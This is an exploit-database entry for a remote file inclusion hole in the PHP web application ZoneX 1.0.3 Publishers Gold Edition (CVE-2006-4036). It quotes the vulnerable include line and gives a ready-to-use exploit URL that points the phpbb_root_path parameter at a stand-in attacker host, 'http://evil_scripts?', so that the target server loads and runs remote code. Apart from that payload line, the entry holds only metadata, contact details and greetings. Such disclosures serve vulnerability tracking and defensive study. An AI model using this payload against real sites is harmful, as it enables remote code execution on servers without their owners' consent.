ZoneX 1.0.3 - Publishers Gold Edition Remote File Inclusion

Author: Mehmet Ince
type: webapps
platform: php
port: nan
date_added: 2006-08-06 
date_updated: 2006-08-07 
verified: 1 
codes: OSVDB-27775;CVE-2006-4036 
tags: 
aliases:  
screenshot_url:  
application_url: 

///////////////////CYBER-WARRiOR.ORG\\\\\\\\\\\\\\\\\\\\\
#ZoneX 1.0.3 - Publishers Gold Edition  Remote File Inclusion Vulnerability
-
#Author: xoron
-
#script: ZoneX 1.0.3 - Publishers Gold Edition
-
#Class : Remote
-
#cont@ct: x0r0n[at]hotmail[dot]com
-
#CODE:    include($phpbb_root_path . 'newsletter/scripts/subscriptions.' .$phpEx)
-
#Exploit: http://www.site.com/[path]/includes/usercp_register.php?phpbb_root_path=http://evil_scripts?
-
#Thanx : WWW.CYBER-WARRiOR.ORG
-
#Greetz: DJR, x-mastER, R3D4C!D and all cyber-warrior users.
///////////////////CYBER-WARRiOR.ORG\\\\\\\\\\\\\\\\\\\\\

# milw0rm.com [2006-08-07]